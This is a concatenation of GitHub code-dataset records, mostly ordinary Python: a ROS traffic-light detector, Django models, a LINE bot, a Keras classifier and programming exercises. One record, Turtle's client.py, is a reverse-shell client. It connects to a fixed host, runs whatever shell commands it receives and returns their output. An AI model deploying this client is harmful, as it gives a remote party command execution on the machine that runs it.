node.broadcastTransform(\n                tf_data,\n                tf_name,\n                tf_parent,\n                node.getCurrentTime()\n            )\n    node.tick()\n","repo_name":"zanellar/rocup","sub_path":"scripts/nodes/production/tfs/tf_manager.py","file_name":"tf_manager.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15159338109","text":"N = int(input())\r\na = []\r\nfor i in range(N):\r\n    temp = input().split(\" \")\r\n    temp = [int(i) for i in temp]\r\n    total = 0\r\n    #print(temp)\r\n    for j in range(4):\r\n        total += temp[j]\r\n    #print(total)\r\n    total += temp[4]*110/900\r\n    a.append(total)\r\n#print(a)\r\nprint(max(a))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc034/A/4263051.py","file_name":"4263051.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"7411320348","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.html import format_html\nfrom django.conf import settings\nfrom crum import get_current_user\nfrom datetime import datetime\nfrom datetime import date\nfrom django.core.validators import MaxValueValidator\nfrom django.contrib.sessions.models import Session\n# from datetime import datetime\n\n\n# Create your models here.\nUser = settings.AUTH_USER_MODEL\n\n# Model to store the list of logged in users\n\nclass UserSession(models.Model):\n    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n    session = models.OneToOneField(Session, on_delete=models.CASCADE)\n\nclass Profile(models.Model):\n    user = models.OneToOneField(User,blank=True, null=True, on_delete = models.CASCADE)\n    name = models.CharField(max_length=200,null=True)\n    is_director = models.BooleanField(default=False)\n    is_standard = models.BooleanField(default=False)\n    is_management = models.BooleanField(default=False)\n    is_principal = models.BooleanField(default=False)\n    is_new = models.BooleanField(default=False)\n    def __str__(self):\n        return 
self.name\n\nclass Pv(models.Model):\n    accounts =(\n        ('Sub CF','Sub CF'),\n        ('Special','Special'),\n        ('Directors','Directors'),\n        ('Operations','Operations'),\n        ('LSGDP','LSGDP'),\n        ('DWAP','DWAP'),\n        ('Capacity(USD)','Capacity(USD)')\n    )\n    acc =(\n        ('Yes','Yes'),\n        ('No', 'No')\n    )\n\n    source =(\n        ('GOG','GOG'),\n        ('Others', 'Others')\n    )\n    pv =(\n        ('General','General'),\n        ('Honorarium','Honorarium')\n    )\n    center=(\n        ('Cost Center 1','Cost Center 1'),\n        ('Cost Center 2','Cost Center 2'),\n        ('Cost Center 3','Cost Center 3'),\n        ('Cost Center 4','Cost Center 4'),\n        ('Cost Center 5','Cost Center 5')\n    )\n    stat =(\n        ('Completed','Completed'),\n        ('Returned','Returned'),\n        ('Cancelled','Cancelled')\n    )\n    IA_System_Code = models.AutoField(primary_key = True)\n    IA_code = models.CharField(max_length = 150)\n    Date_recieved = models.DateField(validators=[MaxValueValidator(limit_value=date.today)])\n    Pv_reference = models.CharField(unique = True, max_length = 120)\n    Source_of_Funding = models.CharField(max_length=50, choices = source)\n    Cost_center = models.CharField(max_length=50, choices = center)\n    Payee = models.CharField(max_length=500,blank=True, null=True)\n    Description = models.CharField(max_length = 500)\n    Account_code = models.CharField(max_length=350)\n    Gross_amount = models.DecimalField(max_digits=19, decimal_places=2)\n    Withholding_tax = models.DecimalField(max_digits=19, decimal_places=2)\n    Net_amount = models.DecimalField(max_digits=19, decimal_places=2)\n    Status = models.CharField(max_length = 60, choices = stat )\n    Remarks =models.CharField(max_length = 500, blank = True)\n    Acc_Impress = models.CharField(max_length = 350,choices=acc)\n    Date_returned =models.DateField(null=True,blank = True)\n    Type_of_accounts= models.CharField(max_length = 100, choices = accounts)\n    Type_of_pv = models.CharField(max_length = 20, choices = pv)\n    returned_to_chest = models.DecimalField(max_digits=19, decimal_places=2,default= 0.00)\n    createds = models.DateTimeField(default= datetime.now,null=True)\n    created_by = models.ForeignKey('auth.User', blank=True, null=True, default=None,on_delete=models.CASCADE,related_name='create')\n    modifieds = models.DateTimeField(null=True,validators=[MaxValueValidator(limit_value=date.today)])\n    modified_by = models.ForeignKey('auth.User', blank=True, null=True,default=None ,on_delete=models.CASCADE,related_name='modified')\n    worker = models.ForeignKey(Profile,null=True, on_delete=models.SET_NULL)\n    class Meta():\n        ordering = [\"-IA_System_Code\"]\n\n    def save(self, *args, **kwargs):\n        user = get_current_user()\n        if user and not user.pk:\n            user = None\n        if not self.pk:\n            self.created_by = user\n            # write to the declared model fields so the timestamps persist\n            self.createds = datetime.now()\n        else:\n            self.modified_by = user\n            self.modifieds = datetime.now()\n        super(Pv, self).save(*args, **kwargs)\n\n\n    def __str__(self):\n        return self.Pv_reference + \"--- \" + self.Description + \"--- \" + self.Type_of_pv\n\n\nclass Grade(models.Model):\n    name = models.CharField(max_length=100)\n\n    def __str__(self):\n        return self.name\n\n\nclass Staff(models.Model):\n    name = models.CharField(max_length = 300)\n    rank = models.ForeignKey(Grade, on_delete=models.CASCADE, blank=True)\n    amount = models.DecimalField(max_digits=19, decimal_places=2)\n    Pv_reference = models.ForeignKey('Pv',on_delete=models.CASCADE, related_name='Pvreference')\n    Date_added = models.DateTimeField(default= datetime.now)\n\n    def __str__(self):\n        return self.name\n\n\n\n\n\n\n    # class 
Grade(models.Model):\n","repo_name":"ITtechnical/pv","sub_path":"auditservice/pv/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39457384499","text":"import os\nimport json\n\n\nroot1 = \"evaluation\"\nroot2 = \"training\"\n\ndata = {}\ndata[\"evaluation\"] = []\ndata[\"training\"] = []\n\nfor filename in os.listdir(root1):\n    data[\"evaluation\"].append(filename)\nfor filename in os.listdir(root2):\n    data[\"training\"].append(filename)\n\n# use a context manager so the file is flushed and closed\nwith open(\"file_list.json\", \"w\") as f:\n    json.dump(data, f, indent=4, sort_keys=True)\n","repo_name":"ZhuFengdaaa/ARC-C","sub_path":"data/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36058903237","text":"from plone.app.contentmenu.menu import DisplaySubMenuItem, FactoriesSubMenuItem\nfrom genweb.core import GenwebMessageFactory as _\nfrom plone.app.dexterity.behaviors.constrains import ConstrainTypesBehavior\nfrom Products.CMFPlone.interfaces.constrains import ISelectableConstrainTypes\n\n# constants for enableConstrain. Copied from AT\nACQUIRE = -1  # acquire locallyAllowedTypes from parent (default)\nDISABLED = 0  # use default behavior of PortalFolder which uses the FTI info\nENABLED = 1  # allow types from locallyAllowedTypes only\n\n\nclass gwDisplaySubMenuItem(DisplaySubMenuItem):\n\n    title = _(u'label_choose_template', default=u'Display')\n\n\nclass gwFactoriesSubMenuItem(FactoriesSubMenuItem):\n\n    title = _(u'label_add_new_item', default=u'Add new\\u2026')\n\n\nclass gwConstrainTypesBehavior(ConstrainTypesBehavior):\n\n    def _filterByDefaults(self, types, context=None):\n        \"\"\"\n        Filter the given types by the items which would also be allowed by\n        default. This is important; otherwise users could circumvent security restrictions.\n        \"\"\"\n        if context is None:\n            context = self.context\n        defaults = [\n            fti.getId() for fti in self.getDefaultAddableTypes(context)\n        ]\n        return [x for x in types if x in defaults]\n\n    def allowedContentTypes(self, context=None):\n        \"\"\"\n        If constraints are enabled, return the locally allowed types.\n        If the setting is ACQUIRE, acquire the locally allowed types according\n        to the ACQUIRE rules, described in the interface.\n        If constraints are disabled, use the default addable types\n\n        This method returns the FTI, NOT the FTI id, like most other methods.\n        \"\"\"\n        if context is None:\n            context = self.context\n        mode = self.getConstrainTypesMode()\n        default_addable = self.getDefaultAddableTypes(context)\n\n        if mode == DISABLED:\n            return default_addable\n        elif mode == ENABLED:\n            if hasattr(self.context, 'locally_allowed_types'):\n                return [t for t in default_addable if t.getId() in\n                        self.context.locally_allowed_types]\n            else:\n                return default_addable\n        elif mode == ACQUIRE:\n            parent = self.context.__parent__\n            parent_constrain_adapter = ISelectableConstrainTypes(parent, None)\n            if not parent_constrain_adapter:\n                return default_addable\n            return_tids = self._filterByDefaults(\n                parent_constrain_adapter.getLocallyAllowedTypes(\n                    context), context)\n            return [t for t in default_addable if t.getId() in return_tids]\n        else:\n            raise Exception(\n                \"Wrong constraint setting. 
%i is an invalid value\" % mode)\n\n    def getImmediatelyAddableTypes(self, context=None):\n        \"\"\"\n        If constraints are enabled, return the locally immediately\n        addable types.\n        If the setting is ACQUIRE, acquire the immediately addable types from\n        the parent, according to the rules described in the interface.\n        If constraints are disabled, use the default addable types\n        \"\"\"\n        if context is None:\n            context = self.context\n        mode = self.getConstrainTypesMode()\n        default_addable = [t.getId() for t in self.getDefaultAddableTypes(context)]\n\n        if mode == DISABLED:\n            return default_addable\n        elif mode == ENABLED:\n            if hasattr(self.context, 'immediately_addable_types'):\n                return self._filterByDefaults(\n                    self.context.immediately_addable_types, context)\n            return default_addable\n        elif mode == ACQUIRE:\n            parent = self.context.__parent__\n            parent_constrain_adapter = ISelectableConstrainTypes(parent, None)\n            if not parent_constrain_adapter:\n                return default_addable\n            return self._filterByDefaults(\n                parent_constrain_adapter.getImmediatelyAddableTypes(context), context)\n        else:\n            raise Exception(\n                \"Wrong constraint setting. %i is an invalid value\" % mode)\n","repo_name":"UPCnet/genweb.core","sub_path":"genweb/core/overrides.py","file_name":"overrides.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33268068409","text":"'''a=[1,2,3,4,5]\ndef listfunc(list):\n\tprint(list[0],list[-1])\n\nprint(listfunc(a))'''\nb=[1,1,2.3,5,8,13,21,34,55,89]\n'''for i in list(b):\n\tif i<5:\n\t\tprint(i)'''\n\ndef listnum():\n\tnewlist=[]\n\tfor i in list(b):\n\t\tif i<5:\n\t\t\tnewlist.append(i)\n\tprint(newlist)\nlistnum()\n\nc=[1,2,3,4,5,6,7,8,9,10,11,12,13]\ndef listnum3():\n\tnewlist1=[]\n\tfor i in list(b):\n\t\tfor n in list(c):\n\t\t\tif i==n:\n\t\t\t\tnewlist1.append(i)\n\tprint(newlist1)\nlistnum3()\ndef prime(n):\n\tif n < 2:\n\t\treturn False\n\tfor i in range(2, n):\n\t\tif n % i == 0:\n\t\t\treturn False\n\treturn True\nprint([i for i in c if prime(i)])\n","repo_name":"orr19-meet/YL1-201718","sub_path":"Lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"304647003","text":"import sys\n\n\ndef combination(n, m):\n    if n == m or m == 0:\n        return 1\n    if dp[n][m]:\n        return dp[n][m]\n\n    dp[n][m] = combination(n - 1, m - 1) + combination(n - 1, m)\n    return dp[n][m]\n\n\nN, M = map(int, sys.stdin.readline().split())\ndp = [[0 for _ in range(101)] for _ in range(101)]\nprint(combination(N, M))","repo_name":"maroon1290/PS_JoonYeol","sub_path":"BaekJoon/DynamicProgramming/2407번 조합/조합.py","file_name":"조합.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13947043874","text":"import numpy as np\nimport cv2\nimport keras\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nimport cv_bridge\nimport rclpy \nfrom rclpy.node import Node\nfrom sensor_msgs.msg import Image\n\nkerasModelPath = input('Please enter the filePath for the h5 file (Example: /home/brock/Documents/TurtleBotClassifer.h5): ')\n\nclass getCameraDataNode(Node):\n    def __init__(self):\n        super().__init__(\"getCamDataNode\")\n        self.bridge = cv_bridge.CvBridge()\n        self.image_sub = self.create_subscription(Image, \"/camera/image_raw\", self.handle_camera_data, 10)\n        self.model = keras.models.load_model(kerasModelPath)\n\n    def handle_camera_data(self,msg):\n        bot_img 
= self.bridge.imgmsg_to_cv2(msg,desired_encoding='passthrough')\n bot_img = cv2.resize(bot_img,(640,480))\n img = np.expand_dims(bot_img,axis=0)\n prediction = int(self.model.predict(img))\n if prediction == 0:\n print('TurtleBot Detected')\n if prediction != 0:\n print('No TurtleBot Detected')\n \n\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = getCameraDataNode()\n rclpy.spin(node)\n rclpy.shutdown()\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"andrewsimonds14/Highway-Simulation","sub_path":"robotDetection/TurtleBotClassifierNode.py","file_name":"TurtleBotClassifierNode.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33221472322","text":"import numpy as np\nfrom keras.callbacks import Callback\nfrom seqeval.metrics import f1_score, classification_report\n\n\nclass F1Metrics(Callback):\n\n def __init__(self, id2label, pad_value=0, validation_data=None):\n \"\"\"\n Args:\n id2label (dict): id to label mapping.\n (e.g. {1: 'B-LOC', 2: 'I-LOC'})\n pad_value (int): padding value.\n \"\"\"\n super(F1Metrics, self).__init__()\n self.id2label = id2label\n self.pad_value = pad_value\n self.validation_data = validation_data\n self.is_fit = validation_data is None\n\n def find_pad_index(self, array):\n \"\"\"Find padding index.\n\n Args:\n array (list): integer list.\n\n Returns:\n idx: padding index.\n\n Examples:\n >>> array = [1, 2, 0]\n >>> self.find_pad_index(array)\n 2\n \"\"\"\n try:\n return list(array).index(self.pad_value)\n except ValueError:\n return len(array)\n\n def get_length(self, y):\n \"\"\"Get true length of y.\n\n Args:\n y (list): padded list.\n\n Returns:\n lens: true length of y.\n\n Examples:\n >>> y = [[1, 0, 0], [1, 1, 0], [1, 1, 1]]\n >>> self.get_length(y)\n [1, 2, 3]\n \"\"\"\n lens = [self.find_pad_index(row) for row in y]\n return lens\n\n def convert_idx_to_name(self, y, lens):\n \"\"\"Convert label index to name.\n\n Args:\n y (list): label index list.\n lens (list): true length of y.\n\n Returns:\n y: label name list.\n\n Examples:\n >>> # assumes that id2label = {1: 'B-LOC', 2: 'I-LOC'}\n >>> y = [[1, 0, 0], [1, 2, 0], [1, 1, 1]]\n >>> lens = [1, 2, 3]\n >>> self.convert_idx_to_name(y, lens)\n [['B-LOC'], ['B-LOC', 'I-LOC'], ['B-LOC', 'B-LOC', 'B-LOC']]\n \"\"\"\n y = [[self.id2label[idx] for idx in row[:l]]\n for row, l in zip(y, lens)]\n return y\n\n def predict(self, X, y):\n \"\"\"Predict sequences.\n\n Args:\n X (list): input data.\n y (list): tags.\n\n Returns:\n y_true: true sequences.\n y_pred: predicted sequences.\n \"\"\"\n y_pred = self.model.predict_on_batch(X)\n\n # reduce dimension.\n y_true = np.argmax(y, -1)\n y_pred = np.argmax(y_pred, -1)\n\n lens = self.get_length(y_true)\n\n y_true = self.convert_idx_to_name(y_true, lens)\n y_pred = self.convert_idx_to_name(y_pred, lens)\n\n return y_true, y_pred\n\n def score(self, y_true, y_pred):\n \"\"\"Calculate f1 score.\n\n Args:\n y_true (list): true sequences.\n y_pred (list): predicted sequences.\n\n Returns:\n score: f1 score.\n \"\"\"\n score = f1_score(y_true, y_pred)\n print(' - f1: {:04.2f}'.format(score * 100))\n print(classification_report(y_true, y_pred, digits=4))\n return score\n\n def on_epoch_end(self, epoch, logs={}):\n if self.is_fit:\n self.on_epoch_end_fit(epoch, logs)\n else:\n self.on_epoch_end_fit_generator(epoch, logs)\n\n def on_epoch_end_fit(self, epoch, logs={}):\n X = self.validation_data[0]\n y = self.validation_data[1]\n y_true, y_pred = 
self.predict(X, y)\n        score = self.score(y_true, y_pred)\n        logs['f1'] = score\n\n    def on_epoch_end_fit_generator(self, epoch, logs={}):\n        y_true = []\n        y_pred = []\n        for X, y in self.validation_data:\n            y_true_batch, y_pred_batch = self.predict(X, y)\n            y_true.extend(y_true_batch)\n            y_pred.extend(y_pred_batch)\n        score = self.score(y_true, y_pred)\n        logs['f1'] = score\n","repo_name":"otaku-47/Legal_EE","sub_path":"Demo/venv/Lib/site-packages/seqeval/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31685716257","text":"import logging\nimport time\n\n# import the original example.py\nfrom handler import DigitalBeing as DB\n\nlogger = logging.getLogger('server_logger')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('grpc_server.log')\nfh.setLevel(logging.DEBUG)\n\nlogger.addHandler(fh)\n\n# create a class to define the server functions, derived from\n# example_pb2_grpc.AgentServicer\nclass Service():\n\n    def __init__(self):\n        self.digital_being = DB()\n    \nService()\ntry:\n    while True:\n        time.sleep(86400)\nexcept KeyboardInterrupt:\n    pass\n","repo_name":"EtherealEngine/Digital-Beings","sub_path":"server/grpc/pyserver.py","file_name":"pyserver.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"72"} +{"seq_id":"15213748917","text":"'''Main tests in API'''\nimport unittest\nfrom model.source.caged import BaseCaged, CagedSaldo\n\nclass BaseCagedGetOptionsEmpresaTest(unittest.TestCase):\n    ''' Class that tests translation of options from general to\n        datasource-oriented ones '''\n    def test_options_empresa_translation(self):\n        ''' Tests if the options are correctly built according to given args '''\n        self.assertEqual(\n            BaseCaged().get_options_empresa(\n                {'column': 2099, 'cnpj_raiz': '12345678'},\n                {'compet': 'col_compet', 'cnpj_raiz': 'col_cnpj_raiz'},\n                'cagedtrabalhador',\n                None\n            ),\n            {\n                'categorias': ['col_cnpj_raiz'],\n                'agregacao': ['count'],\n                'where': [\n                    \"eq-cast(col_cnpj_raiz as INT)-12345678\",\n                    \"and\", \"eq-cast(col_compet as INT)-2099\",\n                    \"and\", \"eq-tipo_estab-1\"\n                ],\n                'theme': 'cagedtrabalhador'\n            }\n        )\n\n    def test_rules_empresa_translation(self):\n        ''' Tests if the options are correctly built according to given args '''\n        self.assertEqual(\n            BaseCaged().get_options_rules_empresa(\n                {'column': 2099, 'cnpj_raiz': '12345678'},\n                {'compet': 'col_compet', 'cnpj_raiz': 'col_cnpj_raiz'},\n                'caged',\n                None\n            ),\n            [\"and\", \"eq-tipo_estab-1\"]\n        )\n\nclass CagedSaldoGetOptionsEmpresaTest(unittest.TestCase):\n    ''' Class that tests translation of options from general to\n        datasource-oriented ones '''\n    def test_options_empresa_translation(self):\n        ''' Tests if the options are correctly built according to given args '''\n        self.assertEqual(\n            CagedSaldo().get_options_empresa(\n                {'cnpj_raiz': '12345678'},\n                {'cnpj': 'col_cnpj'},\n                'cagedsaldo',\n                None\n            ),\n            {\n                'categorias': ['\\'1\\'-pos'],\n                \"valor\": ['qtd_admissoes', 'qtd_desligamentos', 'saldo_mov'],\n                'agregacao': ['sum'],\n                'where': [\n                    \"eqlpint-col_cnpj-12345678-14-0-1-8\",\n                    \"and\", \"eq-tipo_estab-1\"\n                ],\n                'theme': 'cagedsaldo'\n            }\n            
)\n","repo_name":"smartlab-br/datahub-api","sub_path":"app/test/test_model/source/test_caged.py","file_name":"test_caged.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26908252134","text":"import os\nimport socket\nimport subprocess\n\n\n# Create a socket\ndef socket_create():\n try:\n global host\n global port\n global s\n host = '192.168.0.5'\n port = 9999\n s = socket.socket()\n except socket.error as msg:\n print(\"Socket creation error: \" + str(msg))\n\n\n# Connect to a remote socket\ndef socket_connect():\n try:\n global host\n global port\n global s\n s.connect((host, port))\n except socket.error as msg:\n print(\"Socket connection error: \" + str(msg))\n\n\n# Receive commands from remote server and run on local machine\ndef receive_commands():\n global s\n while True:\n data = s.recv(1024)\n if data[:2].decode(\"utf-8\") == 'cd':\n os.chdir(data[3:].decode(\"utf-8\"))\n if len(data) > 0:\n cmd = subprocess.Popen(data[:].decode(\"utf-8\"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n output_bytes = cmd.stdout.read() + cmd.stderr.read()\n output_str = str(output_bytes, \"utf-8\")\n s.send(str.encode(output_str + str(os.getcwd()) + '> '))\n print(output_str)\n s.close()\n\n\ndef main():\n socket_create()\n socket_connect()\n receive_commands()\n\n\nmain()\n","repo_name":"buckyroberts/Turtle","sub_path":"Single_Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"72"} +{"seq_id":"73234776874","text":"from System.Collections.Generic import List\nfrom OpenMetaverse import UUID\nfrom ..rotational import Rotational\n\npeople = Rotational(\"av\")\n\nclass AvatarNames(object):\n name_table = {} # this can be global, it can't differ between instances\n reverse_name_table = {}\n @classmethod\n def add_name(cls, success, names, badIDs):\n if success:\n for i in names:\n cls.name_table[i.ID] = i.DisplayName\n cls.reverse_name_table[i.DisplayName.lower()] = i.ID\n @classmethod\n def name_from_uuid(cls, state, uuid):\n if uuid in cls.name_table:\n return cls.name_table[uuid]\n else:\n l = List[UUID]()\n l.Add(uuid)\n state[\"sl\"].Avatars.GetDisplayNames(l, cls.add_name)\n return None\n @classmethod\n def uuid_from_name(cls, state, name):\n if name.lower() in cls.reverse_name_table:\n return cls.reverse_name_table[name.lower()]\n else: # shouldn't happen unless the name given was a typo\n return None\n\ndef name_of(state, avatar):\n return \"[{0}] [{1} ({2}]\".format(*[\n people.add(avatar.ID),\n AvatarNames.name_from_uuid(state, avatar.ID) if\n AvatarNames.name_from_uuid(state, avatar.ID)\n else \"[display name pending]\",\n avatar.Name])\n \n","repo_name":"Zekka/bakten","sub_path":"bot/slutil/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35572580831","text":"import json\nimport os\nimport socket\n\nfrom flask import Flask, request, abort\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage\n)\nfrom dotenv import load_dotenv\n\nfrom actions.ActionSearchImages import store_all_shop_names\nfrom intents.IntentDispatcher import dispatch\nimport config.Logger\nimport logging 
as LOGGER\n\n\"\"\"\n    configurations\n\"\"\"\nLOGGER.getLogger(__name__)\nload_dotenv()\n\n\"\"\"\n    global variables\n\"\"\"\nline_bot_api = LineBotApi(os.getenv('CHANNEL_ACCESS_TOKEN'))\nhandler = WebhookHandler(os.getenv('CHANNEL_SECRET'))\napp = Flask(__name__)\n\n\"\"\"\n    callback function\n\"\"\"\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n    # get X-Line-Signature header value\n    signature = request.headers['X-Line-Signature']\n\n    # get request body as text\n    body = request.get_data(as_text=True)\n    LOGGER.info(\"Request body: \" + body)\n\n    # handle webhook body\n    try:\n        handler.handle(body, signature)\n    except InvalidSignatureError:\n        LOGGER.error(\"Invalid signature. Please check your channel access token/channel secret.\")\n        abort(400)\n\n    return 'OK'\n\n\"\"\"\n    Clear the cached shop data\n\"\"\"\n\n@app.route(\"/cleanShopCache\", methods=['GET'])\ndef clean_shop_cache():\n    host_name = socket.gethostname()\n    ip_address = socket.gethostbyname(host_name)\n\n    if request.remote_addr == ip_address:\n        store_all_shop_names()\n    else:\n        abort(403)\n\n    return json.dumps({'success': True}), 200, {'ContentType': 'application/json'}\n\n\"\"\"\n    Handle Line text messages\n    :param event: the event\n\"\"\"\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n    profile = line_bot_api.get_profile(event.source.user_id)\n    LOGGER.info(f'Line user ID: {profile.user_id}')\n    LOGGER.info(f'Line user display name: {profile.display_name}')\n    LOGGER.info(f'Line user message: {event.message.text}')\n\n    reply_message = dispatch(intent=event.message.text)\n    if reply_message is not None:\n        line_bot_api.reply_message(event.reply_token, reply_message)\n\nif __name__ == \"__main__\":\n    store_all_shop_names()\n    app.run()\n","repo_name":"gordonfang199649/food_delivery_rider_tool","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35388953355","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport tf\nimport yaml\nfrom math import sqrt\nfrom scipy.spatial import KDTree\n\nSTATE_COUNT_THRESHOLD = 3\n\nclass TLDetector(object):\n    def __init__(self):\n\n        # Swapping the commented lines below shows the estimated traffic light color and processing time \n        rospy.init_node('tl_detector')\n        #rospy.init_node('tl_detector', log_level=rospy.DEBUG)\n\n        self.pose = None\n        self.waypoints = None\n        self.camera_image = None\n        self.lights = []\n\n        sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n        sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n        sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n        sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n        config_string = rospy.get_param(\"/traffic_light_config\")\n        self.config = yaml.safe_load(config_string)\n\n        self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)\n\n        self.bridge = CvBridge()\n        self.light_classifier = TLClassifier()\n        self.listener = tf.TransformListener()\n\n        self.state = TrafficLight.UNKNOWN\n        self.last_state = TrafficLight.UNKNOWN\n        self.last_wp = -1\n        self.state_count = 0\n\n        # Define range in which traffic lights can be seen\n        self.range = 100\n\n        # 
Stores accumulated processing time of image callback\n self.image_cb_total_time = 0.0\n\n # Stores how often image callback has been called\n self.image_cb_counter = 0\n\n # Boolean if image is currently available\n self.has_image = False\n\n self.loop()\n \n def loop(self): \n # loop implemented rather than spin to control the frequency precisely\n rate = rospy.Rate(5)\n \n while not rospy.is_shutdown():\n # if pose and base_waypoints are filled\n if self.has_image:\n self.process_image()\n rate.sleep()\n\n # Stores subscribed current_pose of car\n def pose_cb(self, msg):\n self.pose = msg\n\n # Stores subscribed base_waypoints of car\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints\n waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints]\n self.waypoint_tree = KDTree(waypoints_2d)\n\n # Stores subscribed list of traffic lights tha are in the map\n def traffic_cb(self, msg):\n self.lights = msg.lights\n\n # Stores sensor image\n def image_cb(self, msg):\n self.has_image = True\n self.camera_image = msg\n\n # Process sensor image\n def process_image(self):\n \"\"\"Identifies red lights in the incoming camera image and publishes the index\n of the waypoint closest to the red light's stop line to /traffic_waypoint\n\n Args:\n msg (Image): image from car-mounted camera\n\n \"\"\"\n\n # Store current time\n t1 = rospy.get_time()\n light_wp, state = self.process_traffic_lights()\n\n '''\n Publish upcoming red lights at camera frequency.\n Each predicted state has to occur `STATE_COUNT_THRESHOLD` number\n of times till we start using it. Otherwise the previous stable state is\n used.\n '''\n if self.state != state:\n self.state_count = 0\n self.state = state\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n light_wp = light_wp if state == TrafficLight.RED else -1\n self.last_wp = light_wp\n self.upcoming_red_light_pub.publish(Int32(light_wp))\n else:\n self.upcoming_red_light_pub.publish(Int32(self.last_wp))\n self.state_count += 1\n\n # Store current time\n t2 = rospy.get_time()\n\n # Print average processing time for this callback\n self.image_cb_total_time += (t2 - t1)\n self.image_cb_counter += 1\n self.has_image = False\n rospy.logdebug(\"TL Detector Current proc. time : %f s\", (t2 - t1))\n rospy.logdebug(\"TL Detector Average proc. 
time : %f s\", self.image_cb_total_time / self.image_cb_counter)\n\n def get_closest_waypoint(self, x, y):\n closest_idx = self.waypoint_tree.query([x, y], 1)[1]\n return closest_idx\n\n def get_light_state(self, light):\n \"\"\"Determines the current color of the traffic light\n\n Args:\n light (TrafficLight): light to classify\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n if(not self.has_image):\n self.prev_light_loc = None\n return False\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n #Get classification\n classified_state = self.light_classifier.get_classification(cv_image)\n rospy.logdebug(\"Light state %s, classified state: %s\", light.state, classified_state)\n return classified_state\n\n def get_distance(self, x1, y1, x2, y2):\n return sqrt( (x1-x2)**2 + (y1-y2)**2 )\n\n def process_traffic_lights(self):\n \"\"\"Finds closest visible traffic light, if one exists, and determines its\n location and color\n\n Returns:\n int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n light = None\n line_wp_idx = -1\n\n # List of positions that correspond to the line to stop in front of for a given intersection\n stop_line_positions = self.config['stop_line_positions']\n if(self.pose):\n\n # Get waypoint index of the car\n x_car = self.pose.pose.position.x\n y_car = self.pose.pose.position.y\n car_wp_idx = self.get_closest_waypoint(x_car, y_car)\n\n # Set maximum front distance to next traffic light\n if self.waypoints:\n max_dist = min(len(self.waypoints.waypoints), self.range)\n else:\n max_dist = self.range\n\n # Loop over list of traffic lights to check distance to the car\n for i, traffic_light in enumerate(self.lights):\n # Get stop line waypoint index\n line = stop_line_positions[i]\n temp_wp_idx = self.get_closest_waypoint(line[0], line[1])\n # Find closest stop line waypoint index\n d = 